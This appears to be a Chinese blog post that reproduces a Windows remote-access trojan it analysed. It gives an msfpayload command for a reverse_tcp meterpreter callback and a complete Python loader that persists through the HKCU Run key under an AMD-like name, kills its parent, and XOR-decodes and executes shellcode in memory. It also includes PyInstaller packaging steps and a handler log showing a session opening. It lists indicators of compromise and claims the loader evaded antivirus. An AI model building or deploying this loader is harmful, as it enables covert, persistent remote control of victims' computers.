python+msf 制作 windows远控
最近分析的一个远控，后发现是 meterpreter reverse_http shell（下文复现时用的是 reverse_tcp，监听端需与之一致），文件是个打包的 python（打包成 exe），感谢wstone的指导~
创建dll
# Generate the stage: windows/meterpreter/reverse_tcp calling back to 192.168.1.123:4444
# (lhost/lport must match the multi/handler transcript further down the page).
# NOTE(review): 'X' is msfpayload's "emit a PE executable" output format, while '-t dll'
# looks like an msfencode option; the loader in main.py casts the bytes of this file to a
# function pointer and calls offset 0, so whatever ends up in sc.py must be
# position-independent code, not an ordinary PE/DLL image -- confirm what this command
# actually produces on the Metasploit version in use (msfpayload was later replaced by msfvenom).
./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 -t dll X > /tmp/sc.dll
python
main.py
"""Loader/persistence component of the analysed sample (Python 2, PyInstaller one-file build).

Behaviour visible in this file:
  * copies itself to %APPDATA%\\AMD\\aticlex.exe and registers that path under
    HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run (value name "aticlex");
  * kills its parent process, removes stale PyInstaller _MEI* temp directories;
  * every RECONNECT_SLEEP seconds spawns a child process that XOR-decodes ``sc`` and
    executes it in-memory via ctypes.

``sc`` (from sc.py), and ``getppid``/``kill``/``get_base_dir`` (from utils.py) are not
shown on this page; statements about them below are hedged accordingly.
"""
import sys, os
import shutil
import time
import ctypes
import glob
import multiprocessing
import multiprocessing.forking
from sc import sc
from win32file import GetLongPathName
import _winreg
from itertools import izip, cycle
from utils import getppid, kill, get_base_dir

# Seconds between re-spawning the payload child once it exits (i.e. reconnect interval).
RECONNECT_SLEEP = 60
# Delay before install/cleanup on first start.
STARTUP_SLEEP = 30
# Delay inside the child before the payload is decoded and executed.
CHILD_STARTUP_SLEEP = 10

# Drop name/directory chosen to resemble AMD graphics-driver components.
METER_NAME = "aticlex.exe"
METER_DIR = "AMD"

USER_DIR = os.path.expanduser("~")
try:
    # Preferred location: %APPDATA% (CSIDL_APPDATA, roaming) resolved through the pywin32 shell API.
    from win32com.shell import shellcon, shell
    APPDATA_DIR = shell.SHGetFolderPath(0, shellcon.CSIDL_APPDATA, 0, 0)
    DATA_DIR = os.path.join(APPDATA_DIR, METER_DIR)
except:
    # Fallback when the shell helper is unavailable: <home>\AMD.
    DATA_DIR = os.path.join(USER_DIR, METER_DIR)
# Final on-disk path of the persistent copy; also the value written to the Run key.
METER_PATH = os.path.join(DATA_DIR, METER_NAME)


class _Popen(multiprocessing.forking.Popen):
    """multiprocessing Popen that exports _MEIPASS2 while spawning a child.

    Only active when running frozen (sys.frozen set). This is the usual recipe for
    making multiprocessing work inside a PyInstaller one-file bundle, where the child
    must be told where the unpacked bundle (sys._MEIPASS) lives.
    """
    def __init__(self, *args, **kw):
        if hasattr(sys, 'frozen'):
            os.putenv('_MEIPASS2', sys._MEIPASS)
        try:
            super(_Popen, self).__init__(*args, **kw)
        finally:
            # Always undo the environment change, even if spawning failed.
            if hasattr(sys, 'frozen'):
                os.unsetenv('_MEIPASS2')


class Process(multiprocessing.Process):
    """multiprocessing.Process wired to the frozen-aware _Popen above."""
    _Popen = _Popen


class Worker(Process):
    """Child process that decodes and executes the embedded payload once."""

    def xor(self, data, key='\x41\x82\x99\x73\x12\xf8\x0e\x38'):
        """Return ``data`` XOR-ed with the repeating 8-byte ``key``.

        XOR is symmetric, so the same function encodes and decodes; ``sc`` therefore has
        to be stored already encoded with this key for ``run`` to recover executable code.
        """
        return ''.join(chr(ord(c)^ord(k)) for c,k in izip(data, cycle(key)))

    def run(self):
        """Sleep, decode ``sc``, copy it into a ctypes buffer and call it as a function.

        The buffer is cast to a zero-argument function returning HRESULT and invoked
        directly, so ``sc`` must be position-independent code whose entry is at byte 0.
        NOTE(review): no VirtualAlloc/VirtualProtect is performed here; the buffer is
        ordinary heap memory, so whether this executes depends on the DEP policy of the
        host process -- not established by anything on this page.
        The call does not return until the payload does; the parent's ``join`` in
        ``main`` relies on that to detect when the session is gone.
        """
        time.sleep(CHILD_STARTUP_SLEEP)
        code = self.xor(sc)
        cbuf = ctypes.create_string_buffer(code)
        func = ctypes.cast(cbuf, ctypes.CFUNCTYPE(ctypes.HRESULT))
        func()


def install():
    """Register a Run-key autostart and relocate the executable to METER_PATH.

    Indicators: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run value "aticlex"
    (METER_NAME without extension) pointing at METER_PATH, opened with KEY_ALL_ACCESS.
    If the running binary is not already METER_PATH it is copied there and the current
    process is replaced (execve) by the copy with the same environment; a failed copy
    terminates the process with exit status 1.
    NOTE(review): the original listing lost its indentation; execve is placed inside
    the ``if path != METER_PATH`` branch because an unconditional execve would re-exec
    forever once running from METER_PATH.
    """
    reg = _winreg.ConnectRegistry(None, _winreg.HKEY_CURRENT_USER)
    key = _winreg.OpenKey(reg, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", 0, _winreg.KEY_ALL_ACCESS)
    _winreg.SetValueEx(key, METER_NAME.split(".")[0], 0, _winreg.REG_SZ, METER_PATH)
    # GetLongPathName normalises 8.3 short names so the comparison with METER_PATH is meaningful.
    path = GetLongPathName(sys.executable)
    if path != METER_PATH:
        if not os.path.exists(DATA_DIR):
            os.makedirs(DATA_DIR)
        try:
            shutil.copy(path, METER_PATH)
        except Exception as e:
            sys.exit(1)
        os.execve(METER_PATH, [METER_PATH], os.environ)


def clean():
    """Delete sibling PyInstaller _MEI* extraction directories left in the temp folder.

    ``get_base_dir`` (utils.py, not shown) presumably returns the current bundle's
    _MEIxxxx directory; every other ``_MEI*`` directory next to it is removed, which
    also erases traces of earlier runs. All errors are swallowed -- best effort only.
    """
    try:
        base_dir = get_base_dir()
        temp_dir = os.path.abspath(os.path.join(base_dir, os.pardir))
        mei = base_dir.split("\\")[-1]
        pattern = "%s\\_MEI*" % temp_dir
        for path in glob.glob(pattern):
            path = GetLongPathName(path)
            # Skip the directory this very process is running from.
            if path != base_dir and mei.lower() not in path.lower():
                try:
                    shutil.rmtree(path)
                except:
                    pass
    except:
        pass


def main():
    """Entry point: kill parent, wait, persist, clean up, then run the payload loop.

    ``kill(getppid())`` (utils.py, not shown) presumably terminates whatever launched
    this binary. The loop re-spawns a Worker each time the previous one exits, so a
    dropped Meterpreter session is re-established after RECONNECT_SLEEP seconds;
    ``daemon = True`` means workers die with this process.
    """
    kill(getppid())
    time.sleep(STARTUP_SLEEP)
    install()
    clean()
    while True:
        p = Worker()
        p.daemon = True
        p.start()
        p.join()
        time.sleep(RECONNECT_SLEEP)


if __name__ == "__main__":
    # Required for multiprocessing in a frozen Windows executable.
    multiprocessing.freeze_support()
    main()
sc.py
sc = '\x12\x34...'  # 载荷字节串。注意：main.py 运行时会先用 Worker.xor（8 字节 key）对 sc 做异或解码，因此这里写入的必须是已用同一 key 异或编码后的内容，而不是 sc.dll 以 rb 模式读出的原始字节；否则解码后执行的是乱码。
然后用 PyInstaller 打包生成 exe（代码中对 sys._MEIPASS / _MEIPASS2 以及 _MEI* 临时目录的处理正是针对 PyInstaller 单文件模式）。
监听:
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > run
[*] Started reverse handler on 192.168.1.123:4444
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 192.168.1.80
[*] Meterpreter session 1 opened (192.168.1.123:4444 -> 192.168.1.80:1138) at 2014-10-22 19:03:43 -0500
meterpreter >
木马特征:
添加注册表启动项（HKCU\Software\Microsoft\Windows\CurrentVersion\Run，键值名 aticlex，指向 %APPDATA%\AMD\aticlex.exe），并把自身复制到该路径后重新执行；启动时结束父进程、删除 PyInstaller 留下的 _MEI* 临时目录；之后每 60 秒在子进程中异或解码并加载 msf payload（回连断开后自动重连）；作者称当时可过赛门铁克等杀软。
--- --- --- --- From 小小leo 的博客 --- --- --- ---